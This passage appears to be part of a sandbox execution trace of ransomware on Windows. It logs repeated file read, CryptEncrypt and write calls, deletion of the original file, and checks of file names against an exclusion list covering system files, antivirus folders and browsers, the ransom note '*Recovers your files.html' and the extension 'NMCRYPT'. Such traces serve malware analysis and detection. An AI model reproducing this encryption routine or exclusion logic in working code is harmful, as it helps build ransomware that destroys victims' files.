nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.279] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.279] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.279] GetLastError () returned 0x0 [0165.279] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.279] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.279] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.279] GetLastError () returned 0x0 [0165.279] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.279] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.280] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.280] GetLastError () returned 0x0 [0165.280] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.280] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0xa0, lpOverlapped=0x0) returned 1 [0165.280] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0xa0, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0xb0) returned 1 [0165.280] GetLastError () returned 0x0 [0165.280] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0xb0, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0xb0, lpOverlapped=0x0) returned 1 [0165.280] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x0, lpOverlapped=0x0) returned 1 [0165.280] WriteFile (in: hFile=0x15c4, lpBuffer=0x2891f68*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesWritten=0x2d7e63c*=0x0, lpOverlapped=0x0) returned 1 [0165.280] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Sand_Paper.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\sand_paper.jpg")) returned 0x20 [0165.280] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Sand_Paper.jpg", dwFileAttributes=0x20) returned 0 [0165.281] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Sand_Paper.jpg") returned 1 [0165.281] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Sand_Paper.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\sand_paper.jpg")) returned 0 [0165.281] wcscpy (in: _Dest=0x2d7e194, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Sand_Paper.jpg" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Sand_Paper.jpg") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Sand_Paper.jpg" [0165.281] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Sand_Paper.jpg" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery") returned 1 [0165.281] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7e39c | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\.xXF918.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\.xxf918.tmp")) returned 0xf918 [0165.282] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Sand_Paper.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\sand_paper.jpg"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\.xXF918.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\.xxf918.tmp"), dwFlags=0x1) returned 0 [0165.282] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\.xXF918.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\.xxf918.tmp")) returned 1 [0165.282] CryptDestroyKey (hKey=0x9ad438) returned 1 [0165.283] wcslen (_String="OK") returned 0x2 [0165.283] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0165.283] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0165.283] CryptDestroyKey (hKey=0x9ad278) returned 1 [0165.283] CryptDestroyHash (hHash=0x9ad1f8) returned 1 [0165.283] CryptReleaseContext (hProv=0x8e35d8, dwFlags=0x0) returned 1 [0165.283] FindNextFileW (in: hFindFile=0x9ad238, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0165.283] PathMatchSpecW (pszFile="Seyes.emf", pszSpec="*NMCRYPT") returned 0 [0165.283] PathMatchSpecW (pszFile="Seyes.emf", pszSpec="*Recovers your files.html") returned 0 [0165.283] PathMatchSpecW (pszFile="Seyes.emf", pszSpec="*.exe") returned 0 [0165.283] PathMatchSpecW (pszFile="Seyes.emf", pszSpec="*.dll") returned 0 [0165.283] PathMatchSpecW (pszFile="Seyes.emf", pszSpec="*.lnk") returned 0 [0165.283] PathMatchSpecW (pszFile="Seyes.emf", pszSpec="*.bat") returned 0 [0165.283] PathMatchSpecW (pszFile="Seyes.emf", pszSpec="*.ini") returned 0 [0165.283] PathMatchSpecW (pszFile="Seyes.emf", pszSpec="*.msi") returned 0 [0165.283] PathMatchSpecW (pszFile="Seyes.emf", pszSpec="*.scf") returned 0 [0165.283] PathMatchSpecW (pszFile="Seyes.emf", pszSpec="*pagefile.sys*") returned 0 [0165.283] PathMatchSpecW (pszFile="Seyes.emf", pszSpec="*NTUSER.DAT*") returned 0 [0165.283] PathMatchSpecW (pszFile="Seyes.emf", pszSpec="*AppData*") returned 0 [0165.283] PathMatchSpecW (pszFile="Seyes.emf", pszSpec="*\\winrar\\*") returned 0 [0165.283] PathMatchSpecW (pszFile="Seyes.emf", pszSpec="*\\Internet Explorer\\*") returned 0 [0165.283] PathMatchSpecW (pszFile="Seyes.emf", pszSpec="*\\java\\*") returned 0 [0165.283] PathMatchSpecW (pszFile="Seyes.emf", pszSpec="*\\TeamViewer\\*") returned 0 [0165.283] PathMatchSpecW (pszFile="Seyes.emf", pszSpec="*\\windows\\*") returned 0 [0165.283] PathMatchSpecW (pszFile="Seyes.emf", pszSpec="*\\ESET\\*") returned 0 [0165.283] PathMatchSpecW (pszFile="Seyes.emf", pszSpec="*\\AVG\\*") returned 0 [0165.283] PathMatchSpecW (pszFile="Seyes.emf", pszSpec="*\\AVIRA\\*") returned 0 [0165.283] PathMatchSpecW (pszFile="Seyes.emf", pszSpec="*\\AVAST Software\\*") returned 0 [0165.283] PathMatchSpecW (pszFile="Seyes.emf", pszSpec="*Atheros*") returned 0 [0165.283] PathMatchSpecW (pszFile="Seyes.emf", pszSpec="*Realtek*") returned 0 [0165.283] PathMatchSpecW (pszFile="Seyes.emf", pszSpec="*bootmgr*") returned 0 [0165.283] PathMatchSpecW (pszFile="Seyes.emf", pszSpec="*boot*") returned 0 [0165.283] PathMatchSpecW (pszFile="Seyes.emf", pszSpec="*boot*") returned 0 [0165.283] PathMatchSpecW (pszFile="Seyes.emf", pszSpec="*CONFIG.SYS*") returned 0 [0165.283] PathMatchSpecW (pszFile="Seyes.emf", pszSpec="*IO.SYS*") returned 0 [0165.283] PathMatchSpecW (pszFile="Seyes.emf", pszSpec="*MSDOS.SYS*") returned 0 [0165.283] PathMatchSpecW (pszFile="Seyes.emf", pszSpec="*NTDETECT.COM*") returned 0 [0165.283] PathMatchSpecW (pszFile="Seyes.emf", pszSpec="*ntldr*") returned 0 [0165.283] PathMatchSpecW (pszFile="Seyes.emf", pszSpec="*chrome*") returned 0 [0165.283] PathMatchSpecW (pszFile="Seyes.emf", pszSpec="*opera*") returned 0 [0165.283] PathMatchSpecW (pszFile="Seyes.emf", pszSpec="*firefox*") returned 0 [0165.283] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Seyes.emf", pszSpec="*") returned 1 [0165.283] strlen (_Str="NMoreira") returned 0x8 [0165.283] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.283] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.285] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.285] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.285] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.285] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.285] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.285] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.285] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.285] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.285] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.285] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.285] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.285] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.285] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.285] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.285] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.285] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.285] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.285] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.285] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.285] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.285] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.285] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.285] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.285] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.285] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.285] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.285] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.285] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.285] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.285] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.285] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.285] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.285] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.285] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.285] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.285] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.285] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.285] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.285] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.285] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.285] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.285] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.285] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.285] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.285] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.285] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.285] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.285] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.285] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.285] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.285] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.286] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.286] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.286] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.286] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.286] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.286] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.286] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.286] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.286] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.286] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.286] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.286] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.286] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.286] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.286] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.286] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.286] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.286] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.286] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.286] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.286] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.286] 